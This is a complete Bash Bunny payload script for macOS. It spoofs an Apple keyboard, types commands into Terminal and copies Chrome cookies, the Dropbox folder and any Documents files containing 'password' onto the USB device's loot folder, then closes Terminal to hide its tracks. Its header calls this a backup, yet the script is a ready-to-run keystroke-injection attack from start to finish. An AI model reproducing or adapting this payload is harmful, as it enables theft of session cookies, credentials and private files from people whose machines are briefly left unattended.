#!/bin/bash
#
# Title:         sMacAndGrab
# Author:        audibleblink
# Target:      macOS
# Version:       1.1
#
# Backup a list of files from macOS
#
# Yellow (blinking)...Attacking
# Green...............Finished

LED G R 500
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E

# make the loot directory on the BashBunny
mkdir -p /root/udisk/loot/sMacAndGrab

# mounted device name
dev_name="BashBunny"

# loot directory when mounted on the mac
lootdir="/Volumes/$dev_name/loot/sMacAndGrab"

# Add files, folders, or commands that return filenames
files_to_copy=(
"\"~/Library/Application Support/Google/Chrome/Default/Cookies\"" # Quote paths with spaces
"~/Dropbox"
"\$(grep -lr password ~/Documents)" # Escape the subshell to have this run on TARGET
)

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 4000
# the more files in $files to copy, the longer tar will take to compress
# one-liner because we want the move command to wait for tar to finish
QUACK STRING tar -cf \$USER.tar.gz ${files_to_copy[*]}\; mv \$USER.tar.gz $lootdir\; killall Terminal
QUACK ENTER

# sync the filesystem
sync
LED G

